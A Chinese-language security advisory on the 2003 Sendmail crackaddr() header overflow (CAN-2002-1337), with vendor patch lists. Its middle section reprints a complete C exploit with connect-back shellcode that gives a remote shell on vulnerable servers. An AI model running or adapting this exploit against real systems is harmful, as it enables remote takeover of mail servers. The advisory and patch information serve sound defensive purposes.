Sendmail头字段远程缓冲区溢出漏洞 发布时间:2003-03-04 更新时间:2003-03-04 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 CVE(CAN) ID:CAN-2002-1337 受影响系统 Sendmail Pro (all versions) 详细描述 Sendmail是流行的邮件传输代理。 ISS公司发现Sendmail存在一个远程漏洞,远程攻击者可利用该漏洞控制Sendmail服务器。此漏洞可以通过构造特殊的邮件来触发;由于这类邮件属于正常邮件性质,因此即使网络受防火墙或过滤设备保护,攻击也很难被发现,并且成功利用后不会留下任何日志。 该漏洞出现在SMTP传输阶段处理邮件头字段的过程中。当邮件包含地址或者地址列表(如"From","To","CC"字段)时,Sendmail会尝试检查地址是否合法,这个过程由crackaddr()函数完成,此函数位于Sendmail源代码树的headers.c文件中。 处理过程中使用静态缓冲区存储数据,Sendmail探测到缓冲区已满时会停止追加字符,以防止发生缓冲区溢出。Sendmail的实现包含多个安全检查来确保字符过滤正确,但是其中有一个安全检查存在缺陷,攻击者发送恶意地址字段即可触发缓冲区溢出。 X-Force已证实该漏洞可以在现实场景中被利用,在X86架构和其他平台上均可利用。并且由于被溢出的是静态缓冲区而不是堆栈上的缓冲区,不可执行堆栈保护机制对此不起作用。 打过补丁的Sendmail系统在收到此类邮件时会记录如下信息: Dropped invalid comments from header address 并丢弃非法头字段,使服务器不受此邮件影响。由于未打补丁的系统被成功利用时不会留下日志,管理员可将补丁后出现的这条日志作为发现利用尝试的线索之一。 测试代码 /*## copyright LAST STAGE OF DELIRIUM mar 2003 poland *://lsd-pl.net/ #*/ /*## sendmail 8.11.6 #*/ /* proof of concept code for remote sendmail vulnerability */ /* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr] */ /* [-c count] [-t timeout] [-v 80] */ /* where: */ /* target - address of the target host to run this code against */ /* localaddr - address of the host you are running this code from */ /* localport - local port that will listen for shellcode connection */ /* ptr - base ptr of the sendmail buffer containing our arbitrary data */ /* count - brute force loop counter */ /* timeout - select call timeout while waiting for shellcode connection */ /* v - version of the target OS (currently only Slackware 8.0 is supported) */ /* */ #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <unistd.h> #include <netdb.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> #define NOP 0xf8 #define MAXLINE 2048 #define PNUM 12 #define OFF1 (288+156-12) #define OFF2 (1088+288+156+20+48) #define OFF3 (139*2) int tab[]={23,24,25,26}; #define IDX2PTR(i) (PTR+i-OFF1) #define ALLOCBLOCK(idx,size) memset(&lookup[idx],1,size) #define NOTVALIDCHAR(c) 
(((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||\ (((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0))) #define AOFF 33 #define AMSK 38 #define POFF 48 #define PMSK 53 char* lookup=NULL; int gfirst; char shellcode[]= /* 116 bytes */ "\xeb\x02" /* jmp <shellcode+4> */ "\xeb\x08" /* jmp <shellcode+12> */ "\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */ "\xcd\x7f" /* int $0x7f */ "\xc3" /* ret */ "\x5f" /* pop %edi */ "\xff\x47\x01" /* incl 0x1(%edi) */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x6a\x01" /* push $0x1 */ "\x6a\x02" /* push $0x2 */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\x43" /* inc %ebx */ "\xff\xd7" /* call *%edi */ "\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */ "\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */ "\x31\xca" /* xor %ecx,%edx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x5e" /* pop %esi */ "\x6a\x10" /* push $0x10 */ "\x56" /* push %esi */ "\x50" /* push %eax */ "\x50" /* push %eax */ "\x5e" /* pop %esi */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\xb0\x66" /* mov $0x66,%al */ "\x6a\x03" /* push $0x3 */ "\x5b" /* pop %ebx */ "\xff\xd7" /* call *%edi */ "\x56" /* push %esi */ "\x5b" /* pop %ebx */ "\x31\xc9" /* xor %ecx,%ecx */ "\xb1\x03" /* mov $0x3,%cl */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x3f" /* mov $0x3f,%al */ "\x49" /* dec %ecx */ "\xff\xd7" /* call *%edi */ "\x41" /* inc %ecx */ "\xe2\xf6" /* loop <shellcode+81> */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x54" /* push %esp */ "\x5b" /* pop %ebx */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x54" /* push %esp */ "\x59" /* pop %ecx */ "\x31\xd2" /* xor %edx,%edx */ "\xb0\x0b" /* mov $0xb,%al */ "\xff\xd7" /* call *%edi */ ; int 
PTR,MPTR=0xbfffa01c; void putaddr(char* p,int i) { *p++=(i&0xff); *p++=((i>>8)&0xff); *p++=((i>>16)&0xff); *p++=((i>>24)&0xff); } void sendcommand(int sck,char *data,char resp) { char buf[1024]; int i; if (send(sck,data,strlen(data),0)<0) { perror("error");exit(-1); } if (resp) { if ((i=recv(sck,buf,sizeof(buf),0))<0) { perror("error");exit(-1); } buf[i]=0; printf("%s",buf); } } int rev(int a){ int i=1; if((*(char*)&i)) return(a); return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24); } void initlookup() { int i; if (!(lookup=(char*)malloc(MAXLINE))) { printf("error: malloc\n");exit(-1); } ALLOCBLOCK(0,MAXLINE); memset(lookup+OFF1,0,OFF2-OFF1); for(i=0;i<sizeof(tab)/4;i++) ALLOCBLOCK(OFF1+4*tab[i],4); gfirst=1; } int validaddr(int addr) { unsigned char buf[4],c; int i,*p=(int*)buf; *p=addr; for(i=0;i<4;i++) { c=buf[i]; if (NOTVALIDCHAR(c)) return 0; } return 1; } int freeblock(int idx,int size) { int i,j; for(i=j=0;i<size;i++) { if (!lookup[idx+i]) j++; } return (i==j); } int findblock(int addr,int size,int begin) { int i,j,idx,ptr; ptr=addr; if (begin) { idx=OFF1+addr-PTR; while(1) { while(((!validaddr(ptr))||lookup[idx])&&(idx<OFF2)) { idx+=4; ptr+=4; } if (idx>=OFF2) return 0; if (freeblock(idx,size)) return idx; idx+=4; ptr+=4; } } else { idx=addr-PTR; while(1) { while(((!validaddr(ptr))||lookup[idx])&&(idx>OFF1)) { idx-=4; ptr-=4; } if (idx<OFF1) return 0; if (freeblock(idx,size)) return idx; idx-=4; ptr-=4; } } } int findsblock(int sptr) { int optr,sidx,size; size=gfirst ? 
0x2c:0x04; optr=sptr; while(sidx=findblock(sptr,size,1)) { sptr=IDX2PTR(sidx); if (gfirst) { if (validaddr(sptr)) { ALLOCBLOCK(sidx,size); break; } else sptr=optr; } else { if (validaddr(sptr-0x18)&&freeblock(sidx-0x18,4)&&freeblock(sidx+0x0c,4)&& freeblock(sidx+0x10,4)&&freeblock(sidx-0x0e,4)) { ALLOCBLOCK(sidx-0x18,4); ALLOCBLOCK(sidx-0x0e,2); ALLOCBLOCK(sidx,4); ALLOCBLOCK(sidx+0x0c,4); ALLOCBLOCK(sidx+0x10,4); sidx-=0x18; break; } else sptr=optr; } sptr+=4; optr=sptr; } gfirst=0; return sidx; } int findfblock(int fptr,int i1,int i2,int i3) { int fidx,optr; optr=fptr; while(fidx=findblock(fptr,4,0)) { fptr=IDX2PTR(fidx); if (validaddr(fptr-i2)&&validaddr(fptr-i2-i3)&&freeblock(fidx-i3,4)&& freeblock(fidx-i2-i3,4)&&freeblock(fidx-i2-i3+i1,4)) { ALLOCBLOCK(fidx,4); ALLOCBLOCK(fidx-i3,4); ALLOCBLOCK(fidx-i2-i3,4); ALLOCBLOCK(fidx-i2-i3+i1,4); break; } else fptr=optr; fptr-=4; optr=fptr; } return fidx; } void findvalmask(char* val,char* mask,int len) { int i; unsigned char c,m; for(i=0;i<len;i++) { c=val[i]; m=0xff; while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--; val[i]=c^m; mask[i]=m; } } void initasmcode(char *addr,int port) { char abuf[4],amask[4],pbuf[2],pmask[2]; char name[256]; struct hostent *hp; int i; if (!addr) gethostname(name,sizeof(name)); else strcpy(name,addr); if ((i=inet_addr(name))==-1) { if ((hp=gethostbyname(name))==NULL) { printf("error: address\n");exit(-1); } memcpy(&i,hp->h_addr,4); } putaddr(abuf,rev(i)); pbuf[0]=(port>>8)&0xff; pbuf[1]=(port)&0xff; findvalmask(abuf,amask,4); findvalmask(pbuf,pmask,2); memcpy(&shellcode[AOFF],abuf,4); memcpy(&shellcode[AMSK],amask,4); memcpy(&shellcode[POFF],pbuf,2); memcpy(&shellcode[PMSK],pmask,2); } int main(int argc,char **argv){ int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp; int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25; fd_set readfs; struct timeval t; struct sockaddr_in address; struct hostent *hp; char buf[4096],cmd[4096]; char *p,*host,*myhost=NULL; 
printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n"); printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n"); if (argc<3) { printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]); exit(-1); } while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) { switch(c) { case 'b': port=atoi(optarg);break; case 'c': count=atoi(optarg);break; case 'l': myhost=optarg;break; case 't': timeout=atoi(optarg);break; case 'v': vers=atoi(optarg);break; case 'p': sscanf(optarg,"%x",&MPTR); } } host=argv[1]; srv=socket(AF_INET,SOCK_STREAM,0); bzero(&address,sizeof(address)); address.sin_family=AF_INET; address.sin_port=htons(port); if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) { printf("error: bind\n");exit(-1); } if (listen(srv,10)==-1) { printf("error: listen\n");exit(-1); } initasmcode(myhost,port); for(i4=0;i4<count;i4++,MPTR+=cnt*4) { PTR=MPTR; sck=socket(AF_INET,SOCK_STREAM,0); bzero(&address,sizeof(address)); address.sin_family=AF_INET; address.sin_port=htons(25); if ((address.sin_addr.s_addr=inet_addr(host))==-1) { if ((hp=gethostbyname(host))==NULL) { printf("error: address\n");exit(-1); } memcpy(&address.sin_addr.s_addr,hp->h_addr,4); } if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) { printf("error: connect\n");exit(-1); } initlookup(); sendcommand(sck,"helo yahoo.com\n",0); sendcommand(sck,"mail from: anonymous@yahoo.com\n",0); sendcommand(sck,"rcpt to: lp\n",0); sendcommand(sck,"data\n",0); aidx=findblock(PTR,PNUM*4,1); ALLOCBLOCK(aidx,PNUM*4); aptr=IDX2PTR(aidx); printf(".");fflush(stdout); jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1); ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4); switch(vers) { case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break; default: exit(-1); } i2-=8; p=buf; for(i=0;i<138;i++) { *p++='<';*p++='>'; } *p++='('; for(i=0;i<l;i++) *p++=NOP; *p++=')'; *p++=0; putaddr(&buf[OFF3+l],aptr); sprintf(cmd,"From: %s\n",buf); sendcommand(sck,cmd,0); 
sendcommand(sck,"Subject: hello\n",0); memset(cmd,NOP,MAXLINE); cmd[MAXLINE-2]='\n'; cmd[MAXLINE-1]=0; cnt=0; while(cnt<PNUM) { sptr=aptr; fptr=IDX2PTR(OFF2); if (!(sidx=findsblock(sptr))) break; sptr=IDX2PTR(sidx); if (!(fidx=findfblock(fptr,i1,i2,i3))) break; fptr=IDX2PTR(fidx); jmp=IDX2PTR(jidx); while (!validaddr(jmp)) jmp+=4; putaddr(&cmd[aidx],sptr); putaddr(&cmd[sidx+0x24],aptr); putaddr(&cmd[sidx+0x28],aptr); putaddr(&cmd[sidx+0x18],fptr-i2-i3); putaddr(&cmd[fidx-i2-i3],0x01010101); putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8); putaddr(&cmd[fidx-i3],fptr-i3); putaddr(&cmd[fidx],jmp); aidx+=4; PTR-=4; cnt++; } p=&cmd[jidx+4*PNUM]; for(i=0;i<strlen(shellcode);i++) { *p++=shellcode[i]; } sendcommand(sck,cmd,0); sendcommand(sck,"\n",0); sendcommand(sck,".\n",0); free(lookup); FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(srv,&readfs); t.tv_sec=timeout; t.tv_usec=0; if (select(srv+1,&readfs,NULL,NULL,&t)>0) { close(sck); found=1; if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) { printf("error: accept\n");exit(-1); } close(srv); printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr); write(sck,"/bin/uname -a\n",14); } else { close(sck); found=0; } while(found){ FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(sck,&readfs); if(select(sck+1,&readfs,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&readfs)){ if((cnt=read(0,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else {printf("koniec\n");exit(-1);} } write(sck,buf,cnt); } if(FD_ISSET(sck,&readfs)){ if((cnt=read(sck,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else {printf("koniec\n");exit(-1);} } write(1,buf,cnt); } } } } } 解决方案 Sendmail已经发布补丁: ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.security.cr.patch ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.9.3.security.cr.patch 或者建议管理员升级到8.12.8版本。 IBM公司已经提供如下补丁: 临时补丁如下: ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z 正式补丁为: APAR number 
for AIX 4.3.3: IY40500 (available approx. 03/12/2003) APAR number for AIX 5.1.0: IY40501 (available approx. 04/28/2003) APAR number for AIX 5.2.0: IY40502 (available approx. 04/28/2003) Mandrake linux提供如下补丁: Corporate Server 2.1: cc5590958147fdc6d7cc6b6804e1c450 corporate/2.1/RPMS/sendmail-8.12.6-3.2mdk.i586.rpm 9ee215b8d3aa61a75d7bfa7236c89217 corporate/2.1/RPMS/sendmail-cf-8.12.6-3.2mdk.i586.rpm 31ee7452500bead59609119af17b6ebc corporate/2.1/RPMS/sendmail-devel-8.12.6-3.2mdk.i586.rpm bb8b7830640b3b0cbb3c471e60638d26 corporate/2.1/RPMS/sendmail-doc-8.12.6-3.2mdk.i586.rpm 7bf9dab89608b3ecae5574946c78dde8 corporate/2.1/SRPMS/sendmail-8.12.6-3.2mdk.src.rpm Linux-Mandrake 7.2: ffd7899291d6aba1753d996a44661ed2 7.2/RPMS/sendmail-8.11.0-4.2mdk.i586.rpm 47906b6c6ceffb16d9750b88eef18bd8 7.2/RPMS/sendmail-cf-8.11.0-4.2mdk.i586.rpm f84955b5bf1b9d48804694fc8d9fa038 7.2/RPMS/sendmail-doc-8.11.0-4.2mdk.i586.rpm 524c8c9bab32697ca9d7be41b4b34dff 7.2/SRPMS/sendmail-8.11.0-4.2mdk.src.rpm Mandrake Linux 8.0: d8dd245a3fa0d5bd5910da8ed322e4b2 8.0/RPMS/sendmail-8.11.6-4.4mdk.i586.rpm 1c1fa1730c9689ef8ca2fa9b125dde41 8.0/RPMS/sendmail-cf-8.11.6-4.4mdk.i586.rpm 203198fe2cb9914d0f104c2ffa15061b 8.0/RPMS/sendmail-doc-8.11.6-4.4mdk.i586.rpm 2bd522ab0fad1734d2522547d6abe79f 8.0/SRPMS/sendmail-8.11.6-4.4mdk.src.rpm Mandrake Linux 8.0/PPC: 49b589d9c1db215968698296b7e38949 ppc/8.0/RPMS/sendmail-8.11.6-4.4mdk.ppc.rpm 1f0dc78436c35f5397f25a331a6be784 ppc/8.0/RPMS/sendmail-cf-8.11.6-4.4mdk.ppc.rpm beaa61eb5a224c67268f1ccbcaa27287 ppc/8.0/RPMS/sendmail-doc-8.11.6-4.4mdk.ppc.rpm 2bd522ab0fad1734d2522547d6abe79f ppc/8.0/SRPMS/sendmail-8.11.6-4.4mdk.src.rpm Mandrake Linux 8.1: a8e8831e1333f53c4beaad484fba6d6b 8.1/RPMS/sendmail-8.11.6-4.4mdk.i586.rpm 07822e0924603156a328a5d71b35b006 8.1/RPMS/sendmail-cf-8.11.6-4.4mdk.i586.rpm 943676ff37789e3ed56c3feeb4b790c6 8.1/RPMS/sendmail-doc-8.11.6-4.4mdk.i586.rpm 2bd522ab0fad1734d2522547d6abe79f 8.1/SRPMS/sendmail-8.11.6-4.4mdk.src.rpm Mandrake Linux 8.1/IA64: 
67ff005b6eda2074f9c1fc61678eaec5 ia64/8.1/RPMS/sendmail-8.11.6-4.4mdk.ia64.rpm a41192b0d1083047d2437209bc857d50 ia64/8.1/RPMS/sendmail-cf-8.11.6-4.4mdk.ia64.rpm 827a91f80a88f80f1662c8417c702b37 ia64/8.1/RPMS/sendmail-doc-8.11.6-4.4mdk.ia64.rpm 2bd522ab0fad1734d2522547d6abe79f ia64/8.1/SRPMS/sendmail-8.11.6-4.4mdk.src.rpm Mandrake Linux 8.2: c106cd4223cb8defc0331b9ae203c712 8.2/RPMS/sendmail-8.12.1-4.2mdk.i586.rpm 199d6e0d6c5bd79d8bbbaf5482e472e6 8.2/RPMS/sendmail-cf-8.12.1-4.2mdk.i586.rpm b70011d22c13c152d35f9c9572e57051 8.2/RPMS/sendmail-devel-8.12.1-4.2mdk.i586.rpm 865de74f4848e781071a4606a20e42b9 8.2/RPMS/sendmail-doc-8.12.1-4.2mdk.i586.rpm 5d251dd3fc01d98027820282c39a47c4 8.2/SRPMS/sendmail-8.12.1-4.2mdk.src.rpm Mandrake Linux 8.2/PPC: 9b96aa12a5843801e3141ed2aa0bc8c9 ppc/8.2/RPMS/sendmail-8.12.1-4.2mdk.ppc.rpm 1b97053c396aadd596cc8111362938f8 ppc/8.2/RPMS/sendmail-cf-8.12.1-4.2mdk.ppc.rpm 0d8a132188f56a3a2b25a36b1fdf8cd0 ppc/8.2/RPMS/sendmail-devel-8.12.1-4.2mdk.ppc.rpm 911165311c20100dd0bd945fc7a8bac9 ppc/8.2/RPMS/sendmail-doc-8.12.1-4.2mdk.ppc.rpm 5d251dd3fc01d98027820282c39a47c4 ppc/8.2/SRPMS/sendmail-8.12.1-4.2mdk.src.rpm Mandrake Linux 9.0: cc5590958147fdc6d7cc6b6804e1c450 9.0/RPMS/sendmail-8.12.6-3.2mdk.i586.rpm 9ee215b8d3aa61a75d7bfa7236c89217 9.0/RPMS/sendmail-cf-8.12.6-3.2mdk.i586.rpm 31ee7452500bead59609119af17b6ebc 9.0/RPMS/sendmail-devel-8.12.6-3.2mdk.i586.rpm bb8b7830640b3b0cbb3c471e60638d26 9.0/RPMS/sendmail-doc-8.12.6-3.2mdk.i586.rpm 7bf9dab89608b3ecae5574946c78dde8 9.0/SRPMS/sendmail-8.12.6-3.2mdk.src.rpm CONECTIVA LINUX提供如下补丁: UPDATED PACKAGES ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_3cl.src.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_3cl.src.rpm 
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_3cl.src.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_3cl.i386.rpm Redhat提供如下补丁: Red Hat Linux 6.2 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-1.62.2.src.rpm [ via FTP ] [ via HTTP ] 35d83351ea84fdae048b3e6f556bfc4a i386: sendmail-8.11.6-1.62.2.i386.rpm [ via FTP ] [ via HTTP ] 71ddff0b307887232ad2b57c6f828dbd sendmail-cf-8.11.6-1.62.2.i386.rpm [ via FTP ] [ via HTTP ] 3b398feb4f97b05873a864be5d914ee8 sendmail-doc-8.11.6-1.62.2.i386.rpm [ via FTP ] [ via HTTP ] ba2e0d80e5efc7fe3ba2d55f9caa9cb1 Red Hat Linux 7.0 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-23.70.src.rpm [ via FTP ] [ via HTTP ] e3a9eb220d844e1e3a1bd84ada63c853 i386: sendmail-8.11.6-23.70.i386.rpm [ via FTP ] [ via HTTP ] f3bdb70c4b1d95d10a827db33bf77a46 sendmail-cf-8.11.6-23.70.i386.rpm [ via FTP ] [ via HTTP ] e7a8c264257e207d18257dfe075a5fd1 sendmail-devel-8.11.6-23.70.i386.rpm [ via FTP ] [ via HTTP ] c6cf8af32a436d42d0982b99260ce811 sendmail-doc-8.11.6-23.70.i386.rpm [ via FTP ] [ via HTTP ] ba9251c4ed7fc2916e27c8bc406d7f58 Red Hat Linux 7.1 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-23.71.src.rpm [ via FTP ] [ via HTTP ] c2eb6d0135dc60e83506f0c20148822c i386: sendmail-8.11.6-23.71.i386.rpm [ via FTP ] [ via HTTP ] c3a518db2157a56edc5a94f42c32f8db sendmail-cf-8.11.6-23.71.i386.rpm [ via FTP ] [ via HTTP ] 
6cb3a88c447b56f37d0ebba1df4adb23 sendmail-devel-8.11.6-23.71.i386.rpm [ via FTP ] [ via HTTP ] f2fa0e42d15c723c33c876ea075b4508 sendmail-doc-8.11.6-23.71.i386.rpm [ via FTP ] [ via HTTP ] 2cee572aa2fe1eddb3d22f7ab4d43a20 Red Hat Linux 7.2 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-23.72.src.rpm [ via FTP ] [ via HTTP ] 854ee4390631bdcb818fe6cdc132f7da i386: sendmail-8.11.6-23.72.i386.rpm [ via FTP ] [ via HTTP ] dbce6be563a5642400d0a8a9e97f88fc sendmail-cf-8.11.6-23.72.i386.rpm [ via FTP ] [ via HTTP ] 92b8773b155b2cce446645dd55842e87 sendmail-devel-8.11.6-23.72.i386.rpm [ via FTP ] [ via HTTP ] d810fe7d6a61550e3b0ac3a509d00fed sendmail-doc-8.11.6-23.72.i386.rpm [ via FTP ] [ via HTTP ] 722780636eb24b8168f8464817e21de4 ia64: sendmail-8.11.6-23.72.ia64.rpm [ via FTP ] [ via HTTP ] e83825fb7552ad321cb09ecf86df4a29 sendmail-cf-8.11.6-23.72.ia64.rpm [ via FTP ] [ via HTTP ] 70e2f72dffad5ec8565dc957f5c0b111 sendmail-devel-8.11.6-23.72.ia64.rpm [ via FTP ] [ via HTTP ] 8d86d83586e75cbd03f7bccdfb5b97f2 sendmail-doc-8.11.6-23.72.ia64.rpm [ via FTP ] [ via HTTP ] 16eac17677891e77e8eb70bf76dac135 Red Hat Linux 7.3 -------------------------------------------------------------------------------- SRPMS: sendmail-8.11.6-23.73.src.rpm [ via FTP ] [ via HTTP ] 2049d17db0e321ba6028ee4a7ca2ae93 i386: sendmail-8.11.6-23.73.i386.rpm [ via FTP ] [ via HTTP ] ce6852e4c389405bed1f498514b5fa0f sendmail-cf-8.11.6-23.73.i386.rpm [ via FTP ] [ via HTTP ] f994f26ab50b8141ec27a6b04e819d37 sendmail-devel-8.11.6-23.73.i386.rpm [ via FTP ] [ via HTTP ] d6da03d08cdd8e9933616c0e66841302 sendmail-doc-8.11.6-23.73.i386.rpm [ via FTP ] [ via HTTP ] 5fb65ba4b8e91d9d87451e2d1400411f Red Hat Linux 8.0 -------------------------------------------------------------------------------- SRPMS: sendmail-8.12.8-1.80.src.rpm [ via FTP ] [ via HTTP ] 29d277537beb532d6b5f48ad30d81d45 i386: sendmail-8.12.8-1.80.i386.rpm [ via FTP ] [ via HTTP ] 
8bba0d1400ab2e96e3d3c78ce5015597 sendmail-cf-8.12.8-1.80.i386.rpm [ via FTP ] [ via HTTP ] 55ef5ca9c777278eddd48e365ba471c2 sendmail-devel-8.12.8-1.80.i386.rpm [ via FTP ] [ via HTTP ] 87aecce2ae343a69fe1df716b5e89685 sendmail-doc-8.12.8-1.80.i386.rpm [ via FTP ] [ via HTTP ] d945b47a44597e5da06f79658e38b9d8 FreeBSD提供如下补丁信息: ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail.patch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail.patch.asc 或采用二进制文件(.asc为对应文件的PGP签名,下载后应先验证签名再安装): ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.6-i386-crypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.6-i386-crypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.6-i386-nocrypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.6-i386-nocrypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.7-i386-crypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.7-i386-crypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.7-i386-nocrypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-4.7-i386-nocrypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-5.0-i386-crypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-5.0-i386-crypto.bin.gz.asc ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-5.0-i386-nocrypto.bin.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:04/sendmail-5.0-i386-nocrypto.bin.gz.asc SGI提供如下补丁: http://www.sgi.com/support/security/ ftp://patches.sgi.com/support/free/security/patches/ Sun提供如下补丁: SPARC Platform * Solaris 2.6 patch 105395-08 * Solaris 7 patch 107684-08 * Solaris 8 patch 110615-08 * Solaris 9 patch 113575-03 x86 Platform * Solaris 2.6 patch 105396-08 * Solaris 7 patch 107685-08 * Solaris 8 patch 110616-08 * Solaris 9 patch 114137-02 您可以使用下列链接来下载相应补丁: 
http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=<补丁ID>&method=h 其他用户请参看供应商信息。 相关信息 参考:http://www.cert.org/advisories/CA-2003-07.html http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950